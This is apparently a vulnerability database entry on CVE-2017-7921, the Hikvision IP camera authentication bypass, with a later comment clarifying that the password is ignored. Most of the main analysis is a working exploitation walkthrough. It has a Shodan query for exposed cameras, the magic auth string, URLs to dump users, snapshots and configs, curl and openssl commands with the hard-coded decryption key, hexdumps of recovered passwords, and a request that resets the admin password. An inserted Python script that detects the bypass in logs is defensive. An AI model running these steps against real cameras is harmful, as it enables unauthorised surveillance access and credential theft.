CVE-2017-7921
Description
An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.
Ratings
- Attacker Value: Very High
- Exploitability: Very High
Technical Analysis
Recently, I bumped into a bunch of Hikvision cameras during a security engagement and, surprise, surprise, they were all vulnerable to this old vulnerability CVE-2017-7921, discovered by Monte Crypto in September 2017. You can find his write-up here: https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html.
It made me curious, because we are five years further in the game and it looks like the majority of the Hikvision cameras and other white-labelled versions are still vulnerable.
I ran a quick scan with Shodan (search: “App-webs” “200 OK”) and it returns around 160.000 potential targets where, based on my quick assessment, probably 20% remain vulnerable!!!
This is of course bad or good news depending on which side you are on ;–), but regardless of whether you are a good or bad actor, it does make sense to revisit this old timer once more.
A small deep dive into the problem
Many Hikvision IP cameras contain a backdoor: improper authorization logic that allows unauthenticated impersonation of any configured user account.
The basics of this vulnerability are very simple.
Updated based on the comment of @gwillcox-r7
Our dear programmers from Hikvision left a piece of code in the vulnerable firmware that has a hard-coded magic string that bypasses all security on the camera and will provide full admin access. Our dear programmers from Hikvision developed the proprietary HikCGI protocol, which exposes URI endpoints through the camera’s web interface. The HikCGI protocol handler checks for the presence of a parameter named auth in the query string and if that parameter contains a base64-encoded username:password string, the HikCGI API call assumes the identity of the specified user and the password is ignored.
Using user admin bypasses all security on the camera and allows an attacker to completely control the camera and modify any setting or retrieve sensitive information.
You can use any combination of base64-encoded admin:password string, such as the one below.
# echo "admin:11" | base64
YWRtaW46MTEK
All that is needed is to append this magic string ?auth=YWRtaW46MTEK to GET and POST queries to access the camera with administrative privileges and do whatever you want.
Examples are:
Retrieve a list of all users and their roles: http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtain a camera snapshot without authentication: http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
or one can download the camera configuration: http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
And the use cases for exploitation are numerous, as described in the HIKCGI Integration Guide and IP Media Device Management Protocol User Guide from Hikvision.
Let me take two use cases to show how easy it is to retrieve users and passwords and change them.
First of all, if you want to retrieve the users and passwords, first pull the configuration file from the vulnerable camera using the magic string.
curl http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK --output configurationFile
You should get a file named configurationFile which holds all camera information, including the user and password information in plain text.
However, this file is encrypted (rather weak ;-0), so we need to decrypt it first.
There is a nice tool made by WormChickenWizard that will do the job for us. Check it out, but for now I just apply the logic that he described in his README.md.
First decrypt the configurationFile with the following command:
openssl enc -d -in configurationFile -out decryptedoutput -aes-128-ecb -K 279977f62f6cfd2d91cd75b889ce0c9a -nosalt -md md5
The AES encryption is now broken, but the decryptedoutput file is still XOR encoded.
Use the tool from WormChickenWizard to decode the decryptedoutput file to create a readable format that we can view with a hex editor to search for the users and passwords in plain text format.
java XORDecode
You should now have a file called plaintextOutput that you can inspect with a hex viewer or editor.
hexedit plaintextOutput
You will see output like this, and the first admin and password you will find is the default admin password when you perform a factory reset (I love these Hikvision developers ;–)
00008358 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ....................................
0000837C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ....................................
000083A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ....................................
000083C4 00 00 00 00 61 64 6D 69 6E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ....admin...........................
000083E8 31 32 33 34 35 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12345...............................
0000840C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 02 00 00 00 00 FF FF FF FF 00 00 00 00 FF FF FF FF 00 00 00 00 ....................................
00008430 FF FF FF FF 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ....................................
00008454 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ....................................
00008478 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ....................................
If you search a bit further, you will find the actual users and passwords. In this case two users (admin and admln).
000A7BD4 00 00 00 00 08 10 00 00 00 00 00 00 61 64 6D 69 6E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ............admin...................
000A7BF8 00 00 00 00 00 00 00 00 50 61 24 24 57 30 72 64 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 ........Pa$$W0rd....................
000A7C1C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 02 00 00 00 00 FF FF FF FF 00 00 00 00 ....................................
000A7C40 FF FF FF FF 00 00 00 00 FF FF FF FF 00 00 00 00 FF FF FF FF 00 00 00 00 61 64 6D 6C 6E 00 00 00 00 00 00 00 ........................admln.......
000A7C64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 73 64 66 31 32 33 34 00 00 00 00 00 00 00 00 ....................asdf1234........
000A7C88 00 70 0D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 .p..................................
000A7CAC 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ....................................
Now, if this is all too much effort, you can also decide to just reset the admin password with a new password.
The HTML code for that is pretty simple and can be easily executed using Burp.
Note: The new password should have at least 2 UPPERCASE, 2 lowercase and 2 special characters, otherwise it will not be accepted.
Burp request:
PUT /Security/users/1?auth=YWRtaW46MTEK HTTP/1.1

<?xml version="1.0" encoding="UTF-8"?>
<User version="1.0" xmlns="http://www.hikvision.com/ver10/XMLSchema">
<id>1</id>
<userName>admin</userName>
<password>Pa$$W0rd</password>
</User>
To fix CVE-2017-7921, we recommend that users upgrade their Hikvision firmware to the latest version, but looking at the number of vulnerable cameras out there, this will probably not help :–(.
References
I have added a reference to a Metasploit module that I developed, which checks for a vulnerable camera and does the password reset for you.
I am currently updating the functionality of this module with some more actions to retrieve the config file, make a snapshot, enumerate the users and other stuff…
This module will be submitted shortly to the mainstream of Metasploit for acceptance of the Rapid7 development team.
Metasploit Hikvision module –> https://github.com/h00die-gr3y/Metasploit/
Update 24 September 2022:
Metasploit Hikvision module has been released to the mainstream –> https://github.com/rapid7/metasploit-framework/pull/17033
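As an added example (not from the original post or from the author's Metasploit module), the following Python detection logic runs over constructed access-log lines and flags HikCGI requests whose auth parameter base64-decodes to a user:password pair, the bypass pattern described above. The log format, the addresses, the /System/deviceInfo path and the non-admin account names are assumptions.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not from the original page); the
# addresses, timestamps and the "operator"/"viewer" accounts are placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2022:13:55:36 +0000] "GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2022:13:55:40 +0000] "GET /System/configurationFile?auth=YWRtaW46MTEK HTTP/1.1" 200 8896
192.0.2.15 - - [10/Oct/2022:13:56:01 +0000] "GET /onvif-http/snapshot HTTP/1.1" 401 0
192.0.2.15 - - [10/Oct/2022:13:56:05 +0000] "PUT /Security/users/1?auth=b3BlcmF0b3I6eA== HTTP/1.1" 200 0
198.51.100.2 - - [10/Oct/2022:13:57:00 +0000] "GET /System/deviceInfo?auth=notbase64 HTTP/1.1" 200 300
198.51.100.2 - - [10/Oct/2022:13:57:10 +0000] "GET /System/deviceInfo?auth=dmlld2VyOnh5eg== HTTP/1.1" 200 300
"""

# Common log format: source, timestamp, then the quoted request line and status.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Endpoints named on the page as reachable with the magic auth parameter.
SENSITIVE_PREFIXES = ("/Security/users", "/System/configurationFile", "/onvif-http/snapshot")


def decode_auth(value):
    """Return (username, password) when value is base64 of 'user:password', else None."""
    try:
        # parse_qs turns an unescaped '+' into a space; restore it before decoding.
        text = base64.b64decode(value.replace(" ", "+"), validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    user, sep, password = text.rstrip("\n").partition(":")
    if not sep or not user:
        return None
    return user, password


def find_bypass_attempts(log_text):
    """Flag HikCGI requests whose auth parameter decodes to a user:password pair."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for value in parse_qs(parts.query).get("auth", []):
            creds = decode_auth(value)
            if creds is None:
                continue  # not the bypass pattern, e.g. an unrelated token
            hits.append({"src": m.group("src"), "method": m.group("method"), "path": parts.path,
                         "user": creds[0], "status": int(m.group("status")),
                         "sensitive": parts.path.startswith(SENSITIVE_PREFIXES)})
    return hits
```

A 200 response on a sensitive path after such a request means the camera accepted the impersonated identity; on patched firmware the request should be rejected.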
General Information
Vendors
- hikvision
Products
- ds-2cd2032-i firmware
- ds-2cd2112-i firmware
- ds-2cd2132-i firmware
- ds-2cd2212-i5 firmware
- ds-2cd2232-i5 firmware
- ds-2cd2312-i firmware
- ds-2cd2332-i firmware
- ds-2cd2412f-i(w) firmware
- ds-2cd2432f-i(w) firmware
- ds-2cd2512f-i(s) firmware
- ds-2cd2532f-i(s) firmware
- ds-2cd2612f-i(s) firmware
- ds-2cd2632f-i(s) firmware
- ds-2cd2712f-i(s) firmware
- ds-2cd2732f-i(s) firmware
- ds-2cd2t32-i3 firmware
- ds-2cd2t32-i5 firmware
- ds-2cd2t32-i8 firmware
- ds-2cd4012f-(a) firmware
- ds-2cd4012f-(p) firmware
- ds-2cd4012f-(w) firmware
- ds-2cd4012fwd-(a) firmware
- ds-2cd4012fwd-(p) firmware
- ds-2cd4012fwd-(w) firmware
- ds-2cd4024f-(a) firmware
- ds-2cd4024f-(p) firmware
- ds-2cd4024f-(w) firmware
- ds-2cd4032fwd-(a) firmware
- ds-2cd4032fwd-(p) firmware
- ds-2cd4032fwd-(w) firmware
- ds-2cd4112f-i(z) firmware
- ds-2cd4112fwd-i(z) firmware
- ds-2cd4124f-i(z) firmware
- ds-2cd4132fwd-i(z) firmware
- ds-2cd4212f-i(h) firmware
- ds-2cd4212f-i(s) firmware
- ds-2cd4212f-i(z) firmware
- ds-2cd4212fwd-i(h) firmware
- ds-2cd4212fwd-i(s) firmware
- ds-2cd4212fwd-i(z) firmware
- ds-2cd4224f-i(h) firmware
- ds-2cd4224f-i(s) firmware
- ds-2cd4224f-i(z) firmware
- ds-2cd4232fwd-i(h) firmware
- ds-2cd4232fwd-i(s) firmware
- ds-2cd4232fwd-i(z) firmware
- ds-2cd4312f-i(h) firmware
- ds-2cd4312f-i(s) firmware
- ds-2cd4312f-i(z) firmware
- ds-2cd4324f-i(h) firmware
- ds-2cd4324f-i(s) firmware
- ds-2cd4324f-i(z) firmware
- ds-2cd4332fwd-i(h) firmware
- ds-2cd4332fwd-i(s) firmware
- ds-2cd4332fwd-i(z) firmware
- ds-2cd63xx series firmware
- ds-2cd6412fwd firmware
- ds-2dfx series firmware
Technical Analysis
Analysis above is technically correct; however, the real risk is a little higher. Upon rereading the article at https://seclists.org/fulldisclosure/2017/Sep/23, which is the one that https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html copies off of, I saw this key important message:
Hikvision camera API includes support for proprietary HikCGI protocol, which exposes URI endpoints through the camera's web interface. The HikCGI protocol handler checks for the presence of a parameter named "auth" in the query string and if that parameter contains a base64-encoded "username:password" string, the HikCGI API call assumes the identity of the specified user. The password is ignored.
Note specifically that they state that the password is ignored. This is the true risk of this vulnerability. You can specify any user that is a valid user on the system, and because the logic simply checks for the presence of an auth parameter in the URL to HikCGI pages that contains a base64-encoded string matching the pattern username:password, then ignores the password and uses the username for impersonation, you then become that user. The original PoCs used a hardcoded Base64 string of YWRtaW46MTEK, which decodes to admin:11, as the username and password, so at first glance this seemed like a hardcoded credential issue; however, this is not the case. admin is the default user on the vast majority, but not all, Hikvision devices. The impact, however, is still the same, as admin is the highest privileged user on these devices, so you can do anything you want, including flashing the device with new firmware to backdoor the device, or downloading the configuration file containing usernames and passwords (which are supposedly encrypted, albeit with weak encryption that can be cracked due to the use of a weak password protecting the encryption key). Hope that helps!